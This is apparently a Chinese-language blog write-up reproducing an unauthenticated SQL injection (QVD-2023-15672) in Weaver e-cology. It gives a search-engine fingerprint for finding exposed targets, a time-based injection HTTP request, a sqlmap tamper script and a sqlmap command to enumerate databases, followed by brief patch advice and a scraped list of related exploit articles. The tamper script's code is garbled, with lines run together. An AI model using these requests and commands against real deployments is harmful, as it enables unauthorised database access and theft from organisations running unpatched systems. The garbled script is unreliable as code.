0x01 产品简介

泛微协同管理应用平台e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。

0x02 漏洞概述

由于泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。

0x03 影响范围

Ecology 9.x 补丁版本 < 10.58.0

Ecology 8.x 补丁版本 < 10.58.0

0x04 复现环境

鹰图指纹:

web.icon="41eca7a9245394106a09b2534d8030df"

 0x05 漏洞复现

PoC

GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=123+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1 HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

PS:fileid字段为注入点,post和get都可以,经测试,每注入一次,fileid的值(可随意构造)就需要更换一次 ,不然无法成功(可自行尝试),这也是漏洞比较鸡肋的点。

SQLmap利用思路

编写一个每次请求遍历随机数去配合payload实现注入的tamper脚本

import os,re,random
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMSpriority = PRIORITY.HIGHESTdef tamper(payload, **kwargs):result = ""num = random.randint(1,2**27)result = str(num)+payloadreturn result

把数据包放txt里面

POST /weaver/weaver.file.FileDownloadForOutDoc HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closefileid=12*&isFromOutImg=1

尝试注入:

python3 sqlmap.py -r post.txt --tamper=ecology_sql_random.py --batch --dbs

效果:

0x06 修复建议

临时缓解方案

限制访问来源地址,如非必要,不要将系统开放在互联网上。

升级修复方案

目前官方已发布安全补丁,建议受影响用户尽快升级至10.58及以上版本

https://www.weaver.com.cn/cs/securityDownload.asp#

泛微E-Cology SQL注入漏洞复现(QVD-2023-15672)相关推荐

  1. 【漏洞报送】泛微E-Office存在SQL注入漏洞(CNVD-2022-43246)

    0x01 泛微E-Office 泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用.高效智能的原则,为企业快速 ...

  2. 泛微OA V8 SQL注入漏洞和文件上传漏洞

    fofa语句 app="泛微-协同办公OA" SQL注入 在泛微OA V8中的getdata.jsp文件里,通过gatData方法将数据获取并回显在页面上,而在getData方法中 ...

  3. kkcms前台sql注入漏洞复现

    kkcms前台sql注入漏洞复现 目录 安装kkcms 漏洞复现 安装kkcms 下载kkcms地址: https://github.com/https://github.com/ 浏览器访问主机ip ...

  4. espcms5.7.13 sql注入漏洞复现

    espcms5.7.13 sql注入漏洞复现 作者: admin 时间: 2021-06-28 分类: 漏洞复现 使用代码审计工具自动审计,找到select语句,双击进入/adminsoft/cont ...

  5. 通达OA 11.5 SQL注入漏洞复现

    0x00 漏洞描述 通达OA 11.5存在sql注入 0x01 漏洞影响版本 通达oa 11.5 0x02 漏洞复现 1.下载通达OA 11.5 https://cdndown.tongda2000. ...

  6. 泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现

    漏洞描述 泛微e-cology OA系统的WorkflowCenterTreeData接口在使用oracle数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 影响范围 使用oracle数 ...

  7. 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)

    文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...

  8. 泛微e-cology9 SQL注入漏洞复现(QVD-2023-5012)

    1.产品简介 泛微协同管理应用平台e-cology是一套兼具企业信息门户.知识文档管理.工作流程管理.人力资源管理.客户关系管理.项目管理.财务管理.资产管理.供应链管理.数据中心功能的企业大型协同管 ...

  9. 宏景eHR SQL注入漏洞复现(CNVD-2023-08743)

    0x01 产品简介 宏景eHR人力资源管理软件是一款人力资源管理与数字化应用相融合,满足动态化.协同化.流程化.战略化需求的软件. 0x02 漏洞概述 宏景eHR 存在SQL注入漏洞,未经过身份认证的 ...

最新文章

  1. [转] Nodejs 进阶:Express 常用中间件 body-parser 实现解析
  2. android的33种常用组件1
  3. 大众26亿美元投资自动驾驶公司,可这行人才还在继续流失
  4. 服务器无显示器,服务器无显示器 远程桌面
  5. webform 的路由
  6. 中班区域活动设计思路_【年段教研】“小游戏大学问 巧建构促发展” ——石狮实幼中班段年段教研主题建构游戏的组织与开展...
  7. 什么是单页应用(转)
  8. centos7优先wifi连接_WIFI明明已连接,但却无法上网,问题究竟出现在哪里?
  9. 用JavaScript编码URL?
  10. 手机配置都赶上笔记本了
  11. python读入图片,可视化展示图片
  12. python模拟登陆微博_超详细的Python实现微博模拟登陆,小白都能懂
  13. 土方测量-挖方填方量的计算思路
  14. C语言求三角形斜边长
  15. 官网USB读卡器移植(TF卡SDIO模式 + SPI-flash)
  16. html显示隐藏图片,简单的图片显示与隐藏
  17. 运营商大数据怎么获客的?一篇文章告诉你
  18. ArcGIS教程:要素类基础知识(一)
  19. R型单相隔离变压器如何选择?
  20. c++11之特性之std::function(书:深入应用c++11)

热门文章

  1. opencv4android 配置,配置OpenCV4Android开发环境
  2. 日常英语单词 - 动物
  3. 【2019.9.25】Za
  4. 如何复制有版权的光盘
  5. 智能优化算法——飞蛾扑火优化算法(完整Matlab实现)
  6. 临时工兼职人员招聘管理小程序开发制作功能介绍
  7. oracle+exceeds,oracle 导入报错:field in data file exceeds maximum length
  8. python构建矩阵_python矩阵运算 | 学步园
  9. 我为儿子关云雷命名的出处
  10. 超分辨率——基于SRGAN的图像超分辨率重建(Pytorch实现)